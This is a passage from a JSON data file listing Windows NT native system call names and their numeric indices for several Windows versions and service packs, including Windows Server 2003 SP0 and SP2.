"NtCreateDirectoryObject": "119", "NtCreateEventPair": "120", "NtCreateIoCompletion": "121", "NtCreateJobObject": "122", "NtCreateJobSet": "123", "NtCreateKeyedEvent": "124", "NtCreateMailslotFile": "125", "NtCreateMutant": "126", "NtCreateNamedPipeFile": "127", "NtCreatePagingFile": "128", "NtCreatePort": "129", "NtCreateProcess": "130", "NtCreateProfile": "131", "NtCreateSemaphore": "132", "NtCreateSymbolicLinkObject": "133", "NtCreateTimer": "134", "NtCreateToken": "135", "NtCreateWaitablePort": "136", "NtDebugActiveProcess": "137", "NtDebugContinue": "138", "NtDeleteAtom": "139", "NtDeleteBootEntry": "140", "NtDeleteDriverEntry": "141", "NtDeleteFile": "142", "NtDeleteKey": "143", "NtDeleteObjectAuditAlarm": "144", "NtDeleteValueKey": "145", "NtDisplayString": "146", "NtEnumerateBootEntries": "147", "NtEnumerateDriverEntries": "148", "NtEnumerateSystemEnvironmentValuesEx": "149", "NtExtendSection": "150", "NtFilterToken": "151", "NtFlushInstructionCache": "152", "NtFlushKey": "153", "NtFlushVirtualMemory": "154", "NtFlushWriteBuffer": "155", "NtFreeUserPhysicalPages": "156", "NtGetContextThread": "157", "NtGetCurrentProcessorNumber": "158", "NtGetDevicePowerState": "159", "NtGetPlugPlayEvent": "160", "NtGetWriteWatch": "161", "NtImpersonateAnonymousToken": "162", "NtImpersonateThread": "163", "NtInitializeRegistry": "164", "NtInitiatePowerAction": "165", "NtIsSystemResumeAutomatic": "166", "NtListenPort": "167", "NtLoadDriver": "168", "NtLoadKey": "169", "NtLoadKey2": "170", "NtLoadKeyEx": "171", "NtLockFile": "172", "NtLockProductActivationKeys": "173", "NtLockRegistryKey": "174", "NtLockVirtualMemory": "175", "NtMakePermanentObject": "176", "NtMakeTemporaryObject": "177", "NtMapUserPhysicalPages": "178", "NtModifyBootEntry": "179", "NtModifyDriverEntry": "180", "NtNotifyChangeDirectoryFile": "181", "NtNotifyChangeKey": "182", "NtNotifyChangeMultipleKeys": "183", "NtOpenEventPair": "184", "NtOpenIoCompletion": "185", "NtOpenJobObject": "186", "NtOpenKeyedEvent": "187", "NtOpenMutant": "188", "NtOpenObjectAuditAlarm": "189", "NtOpenProcessToken": "190", "NtOpenSemaphore": "191", "NtOpenSymbolicLinkObject": "192", "NtOpenThread": "193", "NtOpenTimer": "194", "NtPlugPlayControl": "195", "NtPrivilegeCheck": "196", "NtPrivilegeObjectAuditAlarm": "197", "NtPrivilegedServiceAuditAlarm": "198", "NtPulseEvent": "199", "NtQueryBootEntryOrder": "200", "NtQueryBootOptions": "201", "NtQueryDebugFilterState": "202", "NtQueryDirectoryObject": "203", "NtQueryDriverEntryOrder": "204", "NtQueryEaFile": "205", "NtQueryFullAttributesFile": "206", "NtQueryInformationAtom": "207", "NtQueryInformationJobObject": "208", "NtQueryInformationPort": "209", "NtQueryInstallUILanguage": "210", "NtQueryIntervalProfile": "211", "NtQueryIoCompletion": "212", "NtQueryMultipleValueKey": "213", "NtQueryMutant": "214", "NtQueryOpenSubKeys": "215", "NtQueryOpenSubKeysEx": "216", "NtQueryPortInformationProcess": "217", "NtQueryQuotaInformationFile": "218", "NtQuerySecurityObject": "219", "NtQuerySemaphore": "220", "NtQuerySymbolicLinkObject": "221", "NtQuerySystemEnvironmentValue": "222", "NtQuerySystemEnvironmentValueEx": "223", "NtQueryTimerResolution": "224", "NtRaiseException": "225", "NtRaiseHardError": "226", "NtRegisterThreadTerminatePort": "227", "NtReleaseKeyedEvent": "228", "NtRemoveProcessDebug": "229", "NtRenameKey": "230", "NtReplaceKey": "231", "NtReplyWaitReplyPort": "232", "NtRequestDeviceWakeup": "233", "NtRequestPort": "234", "NtRequestWakeupLatency": "235", "NtResetEvent": "236", "NtResetWriteWatch": "237", "NtRestoreKey": "238", "NtResumeProcess": "239", "NtSaveKey": "240", "NtSaveKeyEx": "241", "NtSaveMergedKeys": "242", "NtSecureConnectPort": "243", "NtSetBootEntryOrder": "244", "NtSetBootOptions": "245", "NtSetContextThread": "246", "NtSetDebugFilterState": "247", "NtSetDefaultHardErrorPort": "248", "NtSetDefaultLocale": "249", "NtSetDefaultUILanguage": "250", "NtSetDriverEntryOrder": "251", "NtSetEaFile": "252", "NtSetHighEventPair": "253", "NtSetHighWaitLowEventPair": "254", "NtSetInformationDebugObject": "255", "NtSetInformationJobObject": "256", "NtSetInformationKey": "257", "NtSetInformationToken": "258", "NtSetIntervalProfile": "259", "NtSetIoCompletion": "260", "NtSetLdtEntries": "261", "NtSetLowEventPair": "262", "NtSetLowWaitHighEventPair": "263", "NtSetQuotaInformationFile": "264", "NtSetSecurityObject": "265", "NtSetSystemEnvironmentValue": "266", "NtSetSystemEnvironmentValueEx": "267", "NtSetSystemInformation": "268", "NtSetSystemPowerState": "269", "NtSetSystemTime": "270", "NtSetThreadExecutionState": "271", "NtSetTimerResolution": "272", "NtSetUuidSeed": "273", "NtSetVolumeInformationFile": "274", "NtShutdownSystem": "275", "NtSignalAndWaitForSingleObject": "276", "NtStartProfile": "277", "NtStopProfile": "278", "NtSuspendProcess": "279", "NtSuspendThread": "280", "NtSystemDebugControl": "281", "NtTerminateJobObject": "282", "NtTestAlert": "283", "NtTranslateFilePath": "284", "NtUnloadDriver": "285", "NtUnloadKey": "286", "NtUnloadKey2": "287", "NtUnloadKeyEx": "288", "NtUnlockFile": "289", "NtUnlockVirtualMemory": "290", "NtVdmControl": "291", "NtWaitForDebugEvent": "292", "NtWaitForKeyedEvent": "293", "NtWaitHighEventPair": "294", "NtWaitLowEventPair": "295"}, "SP2": {"NtMapUserPhysicalPagesScatter": "0", "NtWaitForSingleObject": "1", "NtCallbackReturn": "2", "NtReadFile": "3", "NtDeviceIoControlFile": "4", "NtWriteFile": "5", "NtRemoveIoCompletion": "6", "NtReleaseSemaphore": "7", "NtReplyWaitReceivePort": "8", "NtReplyPort": "9", "NtSetInformationThread": "10", "NtSetEvent": "11", "NtClose": "12", "NtQueryObject": "13", "NtQueryInformationFile": "14", "NtOpenKey": "15", "NtEnumerateValueKey": "16", "NtFindAtom": "17", "NtQueryDefaultLocale": "18", "NtQueryKey": "19", "NtQueryValueKey": "20", "NtAllocateVirtualMemory": "21", "NtQueryInformationProcess": "22", "NtWaitForMultipleObjects32": "23", "NtWriteFileGather": "24", "NtSetInformationProcess": "25", "NtCreateKey": "26", "NtFreeVirtualMemory": "27", "NtImpersonateClientOfPort": "28", "NtReleaseMutant": "29", "NtQueryInformationToken": "30", "NtRequestWaitReplyPort": "31", "NtQueryVirtualMemory": "32", "NtOpenThreadToken": "33", "NtQueryInformationThread": "34", "NtOpenProcess": "35", "NtSetInformationFile": "36", "NtMapViewOfSection": "37", "NtAccessCheckAndAuditAlarm": "38", "NtUnmapViewOfSection": "39", "NtReplyWaitReceivePortEx": "40", "NtTerminateProcess": "41", "NtSetEventBoostPriority": "42", "NtReadFileScatter": "43", "NtOpenThreadTokenEx": "44", "NtOpenProcessTokenEx": "45", "NtQueryPerformanceCounter": "46", "NtEnumerateKey": "47", "NtOpenFile": "48", "NtDelayExecution": "49", "NtQueryDirectoryFile": "50", "NtQuerySystemInformation": "51", "NtOpenSection": "52", "NtQueryTimer": "53", "NtFsControlFile": "54", "NtWriteVirtualMemory": "55", "NtCloseObjectAuditAlarm": "56", "NtDuplicateObject": "57", "NtQueryAttributesFile": "58", "NtClearEvent": "59", "NtReadVirtualMemory": "60", "NtOpenEvent": "61", "NtAdjustPrivilegesToken": "62", "NtDuplicateToken": "63", "NtContinue": "64", "NtQueryDefaultUILanguage": "65", "NtQueueApcThread": "66", "NtYieldExecution": "67", "NtAddAtom": "68", "NtCreateEvent": "69", "NtQueryVolumeInformationFile": "70", "NtCreateSection": "71", "NtFlushBuffersFile": "72", "NtApphelpCacheControl": "73", "NtCreateProcessEx": "74", "NtCreateThread": "75", "NtIsProcessInJob": "76", "NtProtectVirtualMemory": "77", "NtQuerySection": "78", "NtResumeThread": "79", "NtTerminateThread": "80", "NtReadRequestData": "81", "NtCreateFile": "82", "NtQueryEvent": "83", "NtWriteRequestData": "84", "NtOpenDirectoryObject": "85", "NtAccessCheckByTypeAndAuditAlarm": "86", "NtQuerySystemTime": "87", "NtWaitForMultipleObjects": "88", "NtSetInformationObject": "89", "NtCancelIoFile": "90", "NtTraceEvent": "91", "NtPowerInformation": "92", "NtSetValueKey": "93", "NtCancelTimer": "94", "NtSetTimer": "95", "NtAcceptConnectPort": "96", "NtAccessCheck": "97", "NtAccessCheckByType": "98", "NtAccessCheckByTypeResultList": "99", "NtAccessCheckByTypeResultListAndAuditAlarm": "100", "NtAccessCheckByTypeResultListAndAuditAlarmByHandle": "101", "NtAddBootEntry": "102", "NtAddDriverEntry": "103", "NtAdjustGroupsToken": "104", "NtAlertResumeThread": "105", "NtAlertThread": "106", "NtAllocateLocallyUniqueId": "107", "NtAllocateUserPhysicalPages": "108", "NtAllocateUuids": "109", "NtAreMappedFilesTheSame": "110", "NtAssignProcessToJobObject": "111", "NtCancelDeviceWakeupRequest": "112", "NtCompactKeys": "113", "NtCompareTokens": "114", "NtCompleteConnectPort": "115", "NtCompressKey": "116", "NtConnectPort": "117", "NtCreateDebugObject": "118", "NtCreateDirectoryObject": "119", "NtCreateEventPair": "120", "NtCreateIoCompletion": "121", "NtCreateJobObject": "122", "NtCreateJobSet": "123", "NtCreateKeyedEvent": "124", "NtCreateMailslotFile": "125", "NtCreateMutant": "126", "NtCreateNamedPipeFile": "127", "NtCreatePagingFile": "128", "NtCreatePort": "129", "NtCreateProcess": "130", "NtCreateProfile": "131", "NtCreateSemaphore": "132", "NtCreateSymbolicLinkObject": "133", "NtCreateTimer": "134", "NtCreateToken": "135", "NtCreateWaitablePort": "136", "NtDebugActiveProcess": "137", "NtDebugContinue": "138", "NtDeleteAtom": "139", "NtDeleteBootEntry": "140", "NtDeleteDriverEntry": "141", "NtDeleteFile": "142", "NtDeleteKey": "143", "NtDeleteObjectAuditAlarm": "144", "NtDeleteValueKey": "145", "NtDisplayString": "146", "NtEnumerateBootEntries": "147", "NtEnumerateDriverEntries": "148", "NtEnumerateSystemEnvironmentValuesEx": "149", "NtExtendSection": "150", "NtFilterToken": "151", "NtFlushInstructionCache": "152", "NtFlushKey": "153", "NtFlushVirtualMemory": "154", "NtFlushWriteBuffer": "155", "NtFreeUserPhysicalPages": "156", "NtGetContextThread": "157", "NtGetCurrentProcessorNumber": "158", "NtGetDevicePowerState": "159", "NtGetPlugPlayEvent": "160", "NtGetWriteWatch": "161", "NtImpersonateAnonymousToken": "162", "NtImpersonateThread": "163", "NtInitializeRegistry": "164", "NtInitiatePowerAction": "165", "NtIsSystemResumeAutomatic": "166", "NtListenPort": "167", "NtLoadDriver": "168", "NtLoadKey": "169", "NtLoadKey2": "170", "NtLoadKeyEx": "171", "NtLockFile": "172", "NtLockProductActivationKeys": "173", "NtLockRegistryKey": "174", "NtLockVirtualMemory": "175", "NtMakePermanentObject": "176", "NtMakeTemporaryObject": "177", "NtMapUserPhysicalPages": "178", "NtModifyBootEntry": "179", "NtModifyDriverEntry": "180", "NtNotifyChangeDirectoryFile": "181", "NtNotifyChangeKey": "182", "NtNotifyChangeMultipleKeys": "183", "NtOpenEventPair": "184", "NtOpenIoCompletion": "185", "NtOpenJobObject": "186", "NtOpenKeyedEvent": "187", "NtOpenMutant": "188", "NtOpenObjectAuditAlarm": "189", "NtOpenProcessToken": "190", "NtOpenSemaphore": "191", "NtOpenSymbolicLinkObject": "192", "NtOpenThread": "193", "NtOpenTimer": "194", "NtPlugPlayControl": "195", "NtPrivilegeCheck": "196", "NtPrivilegeObjectAuditAlarm": "197", "NtPrivilegedServiceAuditAlarm": "198", "NtPulseEvent": "199", "NtQueryBootEntryOrder": "200", "NtQueryBootOptions": "201", "NtQueryDebugFilterState": "202", "NtQueryDirectoryObject": "203", "NtQueryDriverEntryOrder": "204", "NtQueryEaFile": "205", "NtQueryFullAttributesFile": "206", "NtQueryInformationAtom": "207", "NtQueryInformationJobObject": "208", "NtQueryInformationPort": "209", "NtQueryInstallUILanguage": "210", "NtQueryIntervalProfile": "211", "NtQueryIoCompletion": "212", "NtQueryMultipleValueKey": "213", "NtQueryMutant": "214", "NtQueryOpenSubKeys": "215", "NtQueryOpenSubKeysEx": "216", "NtQueryPortInformationProcess": "217", "NtQueryQuotaInformationFile": "218", "NtQuerySecurityObject": "219", "NtQuerySemaphore": "220", "NtQuerySymbolicLinkObject": "221", "NtQuerySystemEnvironmentValue": "222", "NtQuerySystemEnvironmentValueEx": "223", "NtQueryTimerResolution": "224", "NtRaiseException": "225", "NtRaiseHardError": "226", "NtRegisterThreadTerminatePort": "227", "NtReleaseKeyedEvent": "228", "NtRemoveProcessDebug": "229", "NtRenameKey": "230", "NtReplaceKey": "231", "NtReplyWaitReplyPort": "232", "NtRequestDeviceWakeup": "233", "NtRequestPort": "234", "NtRequestWakeupLatency": "235", "NtResetEvent": "236", "NtResetWriteWatch": "237", "NtRestoreKey": "238", "NtResumeProcess": "239", "NtSaveKey": "240", "NtSaveKeyEx": "241", "NtSaveMergedKeys": "242", "NtSecureConnectPort": "243", "NtSetBootEntryOrder": "244", "NtSetBootOptions": "245", "NtSetContextThread": "246", "NtSetDebugFilterState": "247", "NtSetDefaultHardErrorPort": "248", "NtSetDefaultLocale": "249", "NtSetDefaultUILanguage": "250", "NtSetDriverEntryOrder": "251", "NtSetEaFile": "252", "NtSetHighEventPair": "253", "NtSetHighWaitLowEventPair": "254", "NtSetInformationDebugObject": "255", "NtSetInformationJobObject": "256", "NtSetInformationKey": "257", "NtSetInformationToken": "258", "NtSetIntervalProfile": "259", "NtSetIoCompletion": "260", "NtSetLdtEntries": "261", "NtSetLowEventPair": "262", "NtSetLowWaitHighEventPair": "263", "NtSetQuotaInformationFile": "264", "NtSetSecurityObject": "265", "NtSetSystemEnvironmentValue": "266", "NtSetSystemEnvironmentValueEx": "267", "NtSetSystemInformation": "268", "NtSetSystemPowerState": "269", "NtSetSystemTime": "270", "NtSetThreadExecutionState": "271", "NtSetTimerResolution": "272", "NtSetUuidSeed": "273", "NtSetVolumeInformationFile": "274", "NtShutdownSystem": "275", "NtSignalAndWaitForSingleObject": "276", "NtStartProfile": "277", "NtStopProfile": "278", "NtSuspendProcess": "279", "NtSuspendThread": "280", "NtSystemDebugControl": "281", "NtTerminateJobObject": "282", "NtTestAlert": "283", "NtTranslateFilePath": "284", "NtUnloadDriver": "285", "NtUnloadKey": "286", "NtUnloadKey2": "287", "NtUnloadKeyEx": "288", "NtUnlockFile": "289", "NtUnlockVirtualMemory": "290", "NtVdmControl": "291", "NtWaitForDebugEvent": "292", "NtWaitForKeyedEvent": "293", "NtWaitHighEventPair": "294", "NtWaitLowEventPair": "295"}}, "Windows Server 2003": {"SP0": {"NtMapUserPhysicalPagesScatter": "0", "NtWaitForSingleObject": "1", "NtCallbackReturn": "2", "NtReadFile": "3", "NtDeviceIoControlFile": "4", "NtWriteFile": "5", "NtRemoveIoCompletion": "6", "NtReleaseSemaphore": "7", "NtReplyWaitReceivePort": "8", "NtReplyPort": "9", "NtSetInformationThread": "10", "NtSetEvent": "11", "NtClose": "12", "NtQueryObject": "13", "NtQueryInformationFile": "14", "NtOpenKey": "15", "NtEnumerateValueKey": "16", "NtFindAtom": "17", "NtQueryDefaultLocale": "18", "NtQueryKey": "19", "NtQueryValueKey": "20", "NtAllocateVirtualMemory": "21", "NtQueryInformationProcess": "22", "NtWaitForMultipleObjects32": "23", "NtWriteFileGather": "24", "NtSetInformationProcess": "25", "NtCreateKey": "26", "NtFreeVirtualMemory": "27", "NtImpersonateClientOfPort": "28", "NtReleaseMutant": "29", "NtQueryInformationToken": "30", "NtRequestWaitReplyPort": "31", "NtQueryVirtualMemory": "32", "NtOpenThreadToken": "33", "NtQueryInformationThread": "34", "NtOpenProcess": "35", "NtSetInformationFile": "36", "NtMapViewOfSection": "37", "NtAccessCheckAndAuditAlarm": "38", "NtUnmapViewOfSection": "39", "NtReplyWaitReceivePortEx": "40", "NtTerminateProcess": "41", "NtSetEventBoostPriority": "42", "NtReadFileScatter": "43", "NtOpenThreadTokenEx": "44", "NtOpenProcessTokenEx": "45", "NtQueryPerformanceCounter": "46", "NtEnumerateKey": "47", "NtOpenFile": "48", "NtDelayExecution": "49", "NtQueryDirectoryFile": "50", "NtQuerySystemInformation": "51", "NtOpenSection": "52", "NtQueryTimer": "53", "NtFsControlFile": "54", "NtWriteVirtualMemory": "55", "NtCloseObjectAuditAlarm": "56", "NtDuplicateObject": "57", "NtQueryAttributesFile": "58", "NtClearEvent": "59", "NtReadVirtualMemory": "60", "NtOpenEvent": "61", "NtAdjustPrivilegesToken": "62", "NtDuplicateToken": "63", "NtContinue": "64", "NtQueryDefaultUILanguage": "65", "NtQueueApcThread": "66", "NtYieldExecution": "67", "NtAddAtom": "68", "NtCreateEvent": "69", "NtQueryVolumeInformationFile": "70", "NtCreateSection": "71", "NtFlushBuffersFile": "72", "NtApphelpCacheControl": "73", "NtCreateProcessEx": "74", "NtCreateThread": "75", "NtIsProcessInJob": "76", "NtProtectVirtualMemory": "77", "NtQuerySection": "78", "NtResumeThread": "79", "NtTerminateThread": "80", "NtReadRequestData": "81", "NtCreateFile": "82", "NtQueryEvent": "83", "NtWriteRequestData": "84", "NtOpenDirectoryObject": "85", "NtAccessCheckByTypeAndAuditAlarm": "86", "NtQuerySystemTime": "87", "NtWaitForMultipleObjects": "88", "NtSetInformationObject": "89", "NtCancelIoFile": "90", "NtTraceEvent": "91", "NtPowerInformation": "92", "NtSetValueKey": "93", "NtCancelTimer": "94", "NtSetTimer": "95", "NtAcceptConnectPort": "96", "NtAccessCheck": "97", "NtAccessCheckByType": "98", "NtAccessCheckByTypeResultList": "99", "NtAccessCheckByTypeResultListAndAuditAlarm": "100", "NtAccessCheckByTypeResultListAndAuditAlarmByHandle": "101", "NtAddBootEntry": "102", "NtAddDriverEntry": "103", "NtAdjustGroupsToken": "104", "NtAlertResumeThread": "105", "NtAlertThread": "106", "NtAllocateLocallyUniqueId": "107", "NtAllocateUserPhysicalPages": "108", "NtAllocateUuids": "109", "NtAreMappedFilesTheSame": "110", "NtAssignProcessToJobObject": "111", "NtCancelDeviceWakeupRequest": "112", "NtCompactKeys": "113", "NtCompareTokens": "114", "NtCompleteConnectPort": "115", "NtCompressKey": "116", "NtConnectPort": "117", "NtCreateDebugObject": "118", "NtCreateDirectoryObject": "119", "NtCreateEventPair": "120", "NtCreateIoCompletion": "121", "NtCreateJobObject": "122", "NtCreateJobSet": "123", "NtCreateKeyedEvent": "124", "NtCreateMailslotFile": "125", "NtCreateMutant": "126", "NtCreateNamedPipeFile": "127", "NtCreatePagingFile": "128", "NtCreatePort": "129", "NtCreateProcess": "130", "NtCreateProfile": "131", "NtCreateSemaphore": "132", "NtCreateSymbolicLinkObject": "133", "NtCreateTimer": "134", "NtCreateToken": "135", "NtCreateWaitablePort": "136", "NtDebugActiveProcess": "137", "NtDebugContinue": "138", "NtDeleteAtom": "139", "NtDeleteBootEntry": "140", "NtDeleteDriverEntry": "141", "NtDeleteFile": "142", "NtDeleteKey": "143", "NtDeleteObjectAuditAlarm": "144", "NtDeleteValueKey": "145", "NtDisplayString": "146", "NtEnumerateBootEntries": "147", "NtEnumerateDriverEntries": "148", "NtEnumerateSystemEnvironmentValuesEx": "149", "NtExtendSection": "150", "NtFilterToken": "151", "NtFlushInstructionCache": "152", "NtFlushKey": "153", "NtFlushVirtualMemory": "154", "NtFlushWriteBuffer": "155", "NtFreeUserPhysicalPages": "156", "NtGetContextThread": "157", "NtGetCurrentProcessorNumber": "158", "NtGetDevicePowerState": "159", "NtGetPlugPlayEvent": "160", "NtGetWriteWatch": "161", "NtImpersonateAnonymousToken": "162", "NtImpersonateThread": "163", "NtInitializeRegistry": "164", "NtInitiatePowerAction": "165", "NtIsSystemResumeAutomatic": "166", "NtListenPort": "167", "NtLoadDriver": "168", "NtLoadKey": "169", "NtLoadKey2": "170", "NtLoadKeyEx": "171", "NtLockFile": "172", "NtLockProductActivationKeys": "173", "NtLockRegistryKey": "174", "NtLockVirtualMemory": "175", "NtMakePermanentObject": "176", "NtMakeTemporaryObject": "177", "NtMapUserPhysicalPages": "178", "NtModifyBootEntry": "179", "NtModifyDriverEntry": "180", "NtNotifyChangeDirectoryFile": "181", "NtNotifyChangeKey": "182", "NtNotifyChangeMultipleKeys": "183", "NtOpenEventPair": "184", "NtOpenIoCompletion": "185", "NtOpenJobObject": "186", "NtOpenKeyedEvent": "187", "NtOpenMutant": "188", "NtOpenObjectAuditAlarm": "189", "NtOpenProcessToken": "190", "NtOpenSemaphore": "191", "NtOpenSymbolicLinkObject": "192", "NtOpenThread": "193", "NtOpenTimer": "194", "NtPlugPlayControl": "195", "NtPrivilegeCheck": "196", "NtPrivilegeObjectAuditAlarm": "197", "NtPrivilegedServiceAuditAlarm": "198", "NtPulseEvent": "199", "NtQueryBootEntryOrder": "200", "NtQueryBootOptions": "201", "NtQueryDebugFilterState": "202", "NtQueryDirectoryObject": "203", "NtQueryDriverEntryOrder": "204", "NtQueryEaFile": "205", "NtQueryFullAttributesFile": "206", "NtQueryInformationAtom": "207", "NtQueryInformationJobObject": "208", "NtQueryInformationPort": "209", "NtQueryInstallUILanguage": "210", "NtQueryIntervalProfile": "211", "NtQueryIoCompletion": "212", "NtQueryMultipleValueKey": "213", "NtQueryMutant": "214", "NtQueryOpenSubKeys": "215", "NtQueryOpenSubKeysEx": "216", "NtQueryPortInformationProcess": "217", "NtQueryQuotaInformationFile": "218", "NtQuerySecurityObject": "219", "NtQuerySemaphore": "220", "NtQuerySymbolicLinkObject": "221", "NtQuerySystemEnvironmentValue": "222", "NtQuerySystemEnvironmentValueEx": "223", "NtQueryTimerResolution": "224", "NtRaiseException": "225", "NtRaiseHardError": "226", "NtRegisterThreadTerminatePort": "227", "NtReleaseKeyedEvent": "228", "NtRemoveProcessDebug": "229", "NtRenameKey": "230", "NtReplaceKey": "231", "NtReplyWaitReplyPort": "232", "NtRequestDeviceWakeup": "233", "NtRequestPort": "234", "NtRequestWakeupLatency": "235", "NtResetEvent": "236", "NtResetWriteWatch": "237", "NtRestoreKey": "238", "NtResumeProcess": "239", "NtSaveKey": "240", "NtSaveKeyEx": "241", "NtSaveMergedKeys": "242", "NtSecureConnectPort": "243", "NtSetBootEntryOrder": "244", "NtSetBootOptions": "245", "NtSetContextThread": "246", "NtSetDebugFilterState": "247", "NtSetDefaultHardErrorPort": "248", "NtSetDefaultLocale": "249", "NtSetDefaultUILanguage": "250", "NtSetDriverEntryOrder": "251", "NtSetEaFile": "252", "NtSetHighEventPair": "253", "NtSetHighWaitLowEventPair": "254", "NtSetInformationDebugObject": "255", "NtSetInformationJobObject": "256", "NtSetInformationKey": "257", "NtSetInformationToken": "258", "NtSetIntervalProfile": "259", "NtSetIoCompletion": "260", "NtSetLdtEntries": "261", "NtSetLowEventPair": "262", "NtSetLowWaitHighEventPair": "263", "NtSetQuotaInformationFile": "264", "NtSetSecurityObject": "265", "NtSetSystemEnvironmentValue": "266", "NtSetSystemEnvironmentValueEx": "267", "NtSetSystemInformation": "268", "NtSetSystemPowerState": "269", "NtSetSystemTime": "270", "NtSetThreadExecutionState": "271", "NtSetTimerResolution": "272", "NtSetUuidSeed": "273", "NtSetVolumeInformationFile": "274", "NtShutdownSystem": "275", "NtSignalAndWaitForSingleObject": "276", "NtStartProfile": "277", "NtStopProfile": "278", "NtSuspendProcess": "279", "NtSuspendThread": "280", "NtSystemDebugControl": "281", "NtTerminateJobObject": "282", "NtTestAlert": "283", "NtTranslateFilePath": "284", "NtUnloadDriver": "285", "NtUnloadKey": "286", "NtUnloadKey2": "287", "NtUnloadKeyEx": "288", "NtUnlockFile": "289", "NtUnlockVirtualMemory": "290", "NtVdmControl": "291", "NtWaitForDebugEvent": "292", "NtWaitForKeyedEvent": "293", "NtWaitHighEventPair": "294", "NtWaitLowEventPair": "295"}, "SP2": {"NtMapUserPhysicalPagesScatter": "0", "NtWaitForSingleObject": "1", "NtCallbackReturn": "2", "NtReadFile": "3", "NtDeviceIoControlFile": "4", "NtWriteFile": "5", "NtRemoveIoCompletion": "6", "NtReleaseSemaphore": "7", "NtReplyWaitReceivePort": "8", "NtReplyPort": "9", "NtSetInformationThread": "10", "NtSetEvent": "11", "NtClose": "12", "NtQueryObject": "13", "NtQueryInformationFile": "14", "NtOpenKey": "15", "NtEnumerateValueKey": "16", "NtFindAtom": "17", "NtQueryDefaultLocale": "18", "NtQueryKey": "19", "NtQueryValueKey": "20", "NtAllocateVirtualMemory": "21", "NtQueryInformationProcess": "22", "NtWaitForMultipleObjects32": "23", "NtWriteFileGather": "24", "NtSetInformationProcess": "25", "NtCreateKey": "26", "NtFreeVirtualMemory": "27", "NtImpersonateClientOfPort": "28", "NtReleaseMutant": "29", "NtQueryInformationToken": "30", "NtRequestWaitReplyPort": "31", "NtQueryVirtualMemory": "32", "NtOpenThreadToken": "33", "NtQueryInformationThread": "34", "NtOpenProcess": "35", "NtSetInformationFile": "36", "NtMapViewOfSection": "37", "NtAccessCheckAndAuditAlarm": "38", "NtUnmapViewOfSection": "39", "NtReplyWaitReceivePortEx": "40", "NtTerminateProcess": "41", "NtSetEventBoostPriority": "42", "NtReadFileScatter": "43", "NtOpenThreadTokenEx": "44", "NtOpenProcessTokenEx": "45", "NtQueryPerformanceCounter": "46", "NtEnumerateKey": "47", "NtOpenFile": "48", "NtDelayExecution": "49", "NtQueryDirectoryFile": "50", "NtQuerySystemInformation": "51", "NtOpenSection": "52", "NtQueryTimer": "53", "NtFsControlFile": "54", "NtWriteVirtualMemory": "55", "NtCloseObjectAuditAlarm": "56", "NtDuplicateObject": "57", "NtQueryAttributesFile": "58", "NtClearEvent": "59", "NtReadVirtualMemory": "60", "NtOpenEvent": "61", "NtAdjustPrivilegesToken": "62", "NtDuplicateToken": "63", "NtContinue": "64", "NtQueryDefaultUILanguage": "65", "NtQueueApcThread": "66", "NtYieldExecution": "67", "NtAddAtom": "68", "NtCreateEvent": "69", "NtQueryVolumeInformationFile": "70", "NtCreateSection": "71", "NtFlushBuffersFile": "72", "NtApphelpCacheControl": "73", "NtCreateProcessEx": "74", "NtCreateThread": "75", "NtIsProcessInJob": "76", "NtProtectVirtualMemory": "77", "NtQuerySection": "78", "NtResumeThread": "79", "NtTerminateThread": "80", "NtReadRequestData": "81", "NtCreateFile": "82", "NtQueryEvent": "83", "NtWriteRequestData": "84", "NtOpenDirectoryObject": "85", "NtAccessCheckByTypeAndAuditAlarm": "86", "NtQuerySystemTime": "87", "NtWaitForMultipleObjects": "88", "NtSetInformationObject": "89", "NtCancelIoFile": "90", "NtTraceEvent": "91", "NtPowerInformation": "92", "NtSetValueKey": "93", "NtCancelTimer": "94", "NtSetTimer": "95", "NtAcceptConnectPort": "96", "NtAccessCheck": "97", "NtAccessCheckByType": "98", "NtAccessCheckByTypeResultList": "99", "NtAccessCheckByTypeResultListAndAuditAlarm": "100", "NtAccessCheckByTypeResultListAndAuditAlarmByHandle": "101", "NtAddBootEntry": "102", "NtAddDriverEntry": "103", "NtAdjustGroupsToken": "104", "NtAlertResumeThread": "105", "NtAlertThread": "106", "NtAllocateLocallyUniqueId": "107", "NtAllocateUserPhysicalPages": "108", "NtAllocateUuids": "109", "NtAreMappedFilesTheSame": "110", "NtAssignProcessToJobObject": "111", "NtCancelDeviceWakeupRequest": "112", "NtCompactKeys": "113", "NtCompareTokens": "114", "NtCompleteConnectPort": "115", "NtCompressKey": "116", "NtConnectPort": "117", "NtCreateDebugObject": "118", "NtCreateDirectoryObject": "119", "NtCreateEventPair": "120", "NtCreateIoCompletion": "121", "NtCreateJobObject": "122", "NtCreateJobSet": "123", "NtCreateKeyedEvent": "124", "NtCreateMailslotFile": "125", "NtCreateMutant": "126", "NtCreateNamedPipeFile": "127", "NtCreatePagingFile": "128", "NtCreatePort": "129", "NtCreateProcess": "130", "NtCreateProfile": "131", "NtCreateSemaphore": "132", "NtCreateSymbolicLinkObject": "133", "NtCreateTimer": "134", "NtCreateToken": "135", "NtCreateWaitablePort": "136", "NtDebugActiveProcess": "137", "NtDebugContinue": "138", "NtDeleteAtom": "139", "NtDeleteBootEntry": "140", "NtDeleteDriverEntry": "141", "NtDeleteFile": "142", "NtDeleteKey": "143", "NtDeleteObjectAuditAlarm": "144", "NtDeleteValueKey": "145", "NtDisplayString": "146", "NtEnumerateBootEntries": "147", "NtEnumerateDriverEntries": "148", "NtEnumerateSystemEnvironmentValuesEx": "149", "NtExtendSection": "150", "NtFilterToken": "151", "NtFlushInstructionCache": "152", "NtFlushKey": "153", "NtFlushVirtualMemory": "154", "NtFlushWriteBuffer": "155", "NtFreeUserPhysicalPages": "156", "NtGetContextThread": "157", "NtGetCurrentProcessorNumber": "158", "NtGetDevicePowerState": "159", "NtGetPlugPlayEvent": "160", "NtGetWriteWatch": "161", "NtImpersonateAnonymousToken": "162", "NtImpersonateThread": "163", "NtInitializeRegistry": "164", "NtInitiatePowerAction": "165", "NtIsSystemResumeAutomatic": "166", "NtListenPort": "167", "NtLoadDriver": "168", "NtLoadKey": "169", "NtLoadKey2": "170", "NtLoadKeyEx": "171", "NtLockFile": "172", "NtLockProductActivationKeys": "173", "NtLockRegistryKey": "174", "NtLockVirtualMemory": "175", "NtMakePermanentObject": "176", "NtMakeTemporaryObject": "177", "NtMapUserPhysicalPages": "178", "NtModifyBootEntry": "179", "NtModifyDriverEntry": "180", "NtNotifyChangeDirectoryFile": "181", "NtNotifyChangeKey": "182", "NtNotifyChangeMultipleKeys": "183", "NtOpenEventPair": "184", "NtOpenIoCompletion": "185", "NtOpenJobObject": "186", "NtOpenKeyedEvent": "187", 